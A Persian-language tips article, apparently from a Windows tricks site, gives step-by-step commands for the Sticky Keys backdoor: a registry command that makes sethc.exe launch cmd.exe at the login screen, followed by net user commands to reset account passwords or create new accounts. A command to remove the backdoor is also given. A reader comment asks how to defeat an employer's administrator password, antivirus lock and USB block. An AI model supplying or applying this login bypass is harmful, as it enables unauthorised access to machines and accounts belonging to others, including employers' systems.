بدین منظور:
ابتدا (ترفندستان) درمحیط ویندوز کلیدهای ترکیبی Win+R را فشار دهید.
در پنجرهی Run عبارت cmd را وارد کرده و Enter بزنید.
پس از باز شدن پنجرهی Command Prompt دستور زیر را وارد کرده و Enter بزنید:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
نمایش پیغام The operation completed successfully به معنای موفقیتآمیز بودن کار است.
اکنون کافی است از حساب کاربری Log Off کنید و در صفحهی ورود به حسابهای کاربری ویندوز یا همان صفحهی Lock، کلید Shift را 5 بار پشت هم فشار دهید و یا کلیدهای ترکیبی Alt+Shift+PrintScreen را وارد کنید.
خواهید دید که با این کار پنجرهی CMD نمایان میشود.
اکنون (ترفندستان) میتوانید کارهای دلخواه خود با CMD نظیر اجرای برنامههای مختلف، تغییر رمز عبور یک حساب کاربری یا ساخت یک حساب کاربری جدید را انجام دهید.
به عنوان مثال با وارد کردن عبارت taskmgr به Task Manager دسترسی خواهید داشت.
و یا با وارد کردن دستور زیر میتوانید رمز عبور یک حساب کاربری را تغییر دهید:
net user user_name new_password
همچنین با دستور زیر میتوان یک حساب کاربری جدید ایجاد کرد:
net user user_name password /add
در این دستورات به جای user_name نام حساب کاربری مورد نظر و به جای new_password رمز عبور مد نظر خود را قرار دهید.
برای پاک کردن این Backdoor نیز میتوانید از این دستور در محیط CMD استفاده کنید:
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
باسلام و احترام متاسفانه این ترفند برای کامپیوتر شرکت که به قول خودشان همه جوره با ESET Nod V5.0.2248.0 و یا دسترسی با یوزر Standard بسته اند امکان پذیر نگردید. Access is denied errorr امکان داره نحوه حذف پسورد Adminstrator ویندوز و همچنین پسورد ESET Nod V 5.0.2248.0 در حالی که همه جوره از داخل شبکه شرکت مسدود نموده اند (یوزر استاندارد) را آموزش دهید ؟ در ضمن USB اینجانب را از طریق ESET Nod بسته اند. باتشکر
البته امکان نصب برنامه در کامپیوتر شرکت به خاطر تعریف سطح دسترسی استاندارد و یا احتمالا ESET Nod V 5.0.4428.0 مقدور نمی باشد